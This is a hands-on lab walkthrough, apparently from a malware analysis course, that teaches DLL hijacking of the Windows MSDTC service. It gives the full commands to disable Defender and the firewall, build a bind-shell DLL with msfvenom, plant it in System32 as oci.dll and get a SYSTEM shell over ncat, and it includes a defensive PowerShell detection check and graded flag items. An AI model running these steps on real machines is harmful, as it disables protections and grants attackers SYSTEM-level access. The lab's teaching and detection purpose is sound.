Click Start and type DEFENDER.
Open "Windows Defender Settings".
Click "Virus & threat protection".
Under "Virus & threat protection settings", click "Manage settings".
Turn off "Real-time protection" and "Cloud-delivered protection", as shown below.
Leave this Windows Security window open; you'll need it again after installing Metasploit.
In the "Installing Metasploit on Windows" section, click the "latest Windows installer" link.
Put the metasploitframework-latest.msi file in your Downloads folder.
Right-click the metasploitframework-latest.msi file and click Properties. Click Unblock. Click OK. Open an Administrator Command Prompt and execute these commands:
cd \Users\IEuser\Downloads
metasploitframework-latest.msi
Click through the installer, accepting all the default options.
Click "Add an exclusion". Click Folder.
Select C:\metasploit-framework. Click "Select folder". Approve the privilege escalation.
The metasploit-framework now appears as an Exclusion, as shown below.
In the Administrator Command Prompt, execute this command:
C:\metasploit-framework\bin\msfvenom -p windows/x64/shell_bind_tcp -f dll -o shellbind.dll
The DLL is created, as shown below.
In the lower center, click Public network.
Turn the firewall off.
Find the "Distributed Transaction Coordinator" service, as shown below.
From the description, you can see that this process is not important, and from the Status, you can see that it starts automatically.
Right-click "Distributed Transaction Coordinator" and click Properties. Click the "Log On" tab. Here you can see that this process runs as System, the highest possible privileges.
If it's not System, but something else, like Network Service Account, change it to "Local System Account", as shown below.
Click OK. Click OK again.
At the lower left of the desktop, click the magnifying glass. Type PROCMON and open procmon.
Configure the two filters shown at the top of the list below and click OK.
In Services, start the "Distributed Transaction Coordinator" service.
Find the oci.dll entry, as shown below. This DLL was not found. This is a defect in Windows 10, which we will exploit.
In Process Monitor, in the toolbar, click the third icon (the magnifying glass) to stop the monitoring.
Find the msdtc.exe process and click it, as shown below.
From the menu bar, click View, "Show Lower Pane". Then click View, "Lower Pane View", DLLs.
This process uses many DLLs, but oci.dll is missing, as shown below.
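A defender-side check for the condition this lab sets up, added here and not part of the original project: it reports the msdtc logon account, whether an oci.dll is present in System32 (and if so, whether it is signed), and whether anything is listening on the lab's bind port. It assumes the default System32 path and port 4444 used above.

```powershell
# Added defender check (not part of the original lab). Assumes the default
# System32 location and the port 4444 bind shell used in this exercise.
$dllPath = Join-Path $env:SystemRoot 'System32\oci.dll'
$port    = 4444

# 1. msdtc logon account: the hijack is only interesting because it runs as LocalSystem.
$svc = Get-CimInstance Win32_Service -Filter "Name='MSDTC'"
"MSDTC runs as '$($svc.StartName)' (start mode: $($svc.StartMode))"

# 2. Windows does not ship oci.dll in System32; its presence there is suspicious.
if (Test-Path $dllPath) {
    $sig  = Get-AuthenticodeSignature -FilePath $dllPath
    $hash = (Get-FileHash -Algorithm SHA256 -Path $dllPath).Hash
    "ALERT: $dllPath exists. Signature: $($sig.Status); SHA256: $hash"
    if ($sig.Status -ne 'Valid') {
        "  Unsigned or invalid signature: treat as a likely planted DLL and check who wrote it."
    }
} else {
    "OK: $dllPath is absent, so msdtc's lookup for it fails harmlessly."
}

# 3. Is anything listening on the bind port, and which process owns it?
$conn = Get-NetTCPConnection -State Listen -LocalPort $port -ErrorAction SilentlyContinue
foreach ($c in $conn) {
    $proc = Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue
    "ALERT: port $port is listening, owned by PID $($c.OwningProcess) ($($proc.ProcessName))"
}
if (-not $conn) { "OK: nothing is listening on port $port." }
```

Run it from an Administrator PowerShell before and after the lab steps; a listener owned by msdtc.exe together with an unsigned oci.dll in System32 is the signature of this hijack.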
In the Administrator Command Prompt window, execute these commands:
net stop msdtc
copy shellbind.dll c:\windows\system32\oci.dll
Then click the third icon (the magnifying glass) to start monitoring.
In the Administrator Command Prompt window, execute this command:
net start msdtc
Now the oci.dll file loads, as shown below.
PMA 124.1: Detail (10 pts)
The flag is in the Detail field for the first event for oci.dll, covered by a green rectangle in the image below.
PMA 124.2: Using the Shell (5 pts)
Open a new Command Prompt window, and execute these commands:
ncat 127.0.0.1 4444
whoami
The flag is covered by a green rectangle in the image below.
Open Resource Monitor and, on the Network tab, check to see if a process is listening on port 4444, as shown below.
When I did it, the PID was 3200.
If a process is listening on that port, end it in Task Manager, on the Details tab, as shown below.
Then, in an Administrator Command Prompt, execute this command:
Windows Defender adjustments added 3-23-2021